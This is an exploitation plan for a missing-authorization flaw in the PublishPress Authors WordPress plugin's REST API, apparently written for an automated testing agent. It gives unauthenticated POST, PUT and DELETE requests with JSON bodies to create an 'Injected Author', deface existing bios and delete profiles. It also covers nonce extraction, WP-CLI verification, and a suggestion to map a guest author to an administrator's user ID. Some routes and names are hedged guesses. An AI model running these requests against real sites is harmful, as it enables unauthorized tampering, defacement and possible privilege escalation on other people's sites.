Exploitation Research Plan: CVE-2026-25309 (PublishPress Authors)

1. Vulnerability Summary

The PublishPress Authors plugin (<= 4.10.1) contains a missing authorization vulnerability in its REST API implementation. Specifically, the REST API endpoints introduced in version 4.8.0 to "create and update Authors and their fields" (identified in the changelog as feature #2065) do not implement sufficient capability checks. This allow unauthenticated attackers to create, modify, or delete author profiles (Guest Authors), which are stored as ppma_author custom post type objects.

2. Attack Vector Analysis

• Endpoint: WordPress REST API.
• Base Route: /wp-json/publishpress-authors/v1
• Resource Route: /authors or /author
• HTTP Methods: POST (Create), PUT / PATCH (Update), DELETE (Delete).
• Vulnerable Parameter: The entire JSON body for creating/updating author profiles.
• Authentication: None required (Unauthenticated).
• Preconditions: The plugin must be active. Guest Author functionality is typically enabled by default.

3. Code Flow

1. Registration: The plugin registers REST routes during the rest_api_init hook. Based on the 4.8.0 changelog, a controller class (likely within src/core/Classes/ or src/core/Rest/) registers routes for author management.
2. Missing Check: Within the register_rest_route call for the authors endpoint, the permission_callback is either missing, set to __return_true, or fails to verify if the requester has the edit_posts or manage_options capability.
3. Execution: The handler function (e.g., create_item or update_item) processes the input and uses wp_insert_post or internal plugin methods (like those in src/core/Classes/Author_Editor.php) to save the ppma_author data without verifying user permissions.

4. Nonce Acquisition Strategy

REST API endpoints in WordPress typically require a wp_rest nonce for authenticated sessions to prevent CSRF. However, for unauthenticated access to a route where permission_callback is __return_true, the nonce check is often bypassed or not enforced by the REST server for the "anonymous" user.

If a nonce is strictly required:

1. Identify Exposure: The plugin may expose a REST nonce via wp_localize_script to support its block editor or author box features.
2. Shortcode Strategy:
   • Create a page with the author list shortcode: [publishpress_authors_list]
   • wp post create --post_type=page --post_status=publish --post_title="Authors" --post_content='[publishpress_authors_list]'
3. Extraction:
   • Navigate to the new page.
   • Use browser_eval to find the nonce: browser_eval("window.ppAuthorsData?.rest_nonce") or check for common PublishPress localization objects like window.publishpressAuthorsConfig.

5. Exploitation Strategy

We will attempt to create a new Guest Author profile via the REST API.

Step 1: Discover the exact REST route

Perform a GET request to the REST index to confirm the available routes for the plugin.

• Method: GET
• URL: /wp-json/publishpress-authors/v1
• Tool: http_request

Step 2: Create a Guest Author

• Method: POST
• URL: /wp-json/publishpress-authors/v1/authors (or /author)
• Headers:
  • Content-Type: application/json
• Body (JSON):

{
    "title": "Injected Author",
    "description": "This author was created via CVE-2026-25309.",
    "email": "attacker@example.com",
    "slug": "hacked-author",
    "first_name": "Hacked",
    "last_name": "Author"
}

Step 3: Update an Existing Author (If creation fails)

If creation is restricted but update is not, attempt to overwrite an existing Guest Author (ID can be found by listing authors).

• Method: POST or PUT
• URL: /wp-json/publishpress-authors/v1/authors/<ID>
• Body (JSON):

{
    "description": "Defaced bio"
}

6. Test Data Setup

1. Ensure PublishPress Authors is installed and active on version 4.10.1.
2. Create at least one post and assign it to a Guest Author via the WP Admin to ensure the ppma_author post type is initialized and a legitimate target exists.
3. (Optional) Create a page with the [publishpress_authors_list] shortcode to facilitate nonce discovery if needed.

7. Expected Results

• Success: The server returns a 201 Created or 200 OK response with a JSON object representing the newly created or modified author.
• Data Persistence: A new post of type ppma_author will exist in the database with the title "Injected Author".

8. Verification Steps

After the exploit, verify via WP-CLI:

# List all Guest Authors to see the injected one
wp post list --post_type=ppma_author

# Check the specific content of the injected author
wp post get $(wp post list --post_type=ppma_author --name=hacked-author --format=ids) --fields=post_title,post_content

9. Alternative Approaches

• Metadata Manipulation: If the REST API allows updating meta fields, try to map the Guest Author to a real Administrator's user ID by updating the mapped_user_id meta field.
• AJAX Endpoint: If the REST API is protected, check for the AJAX action ppma_author_create_or_update (inferred name) which might be registered via wp_ajax_nopriv_.
• Author Deletion: Attempt a DELETE request to /wp-json/publishpress-authors/v1/authors/<ID> to verify if unauthorized deletion is possible, causing a Denial of Service for author profiles.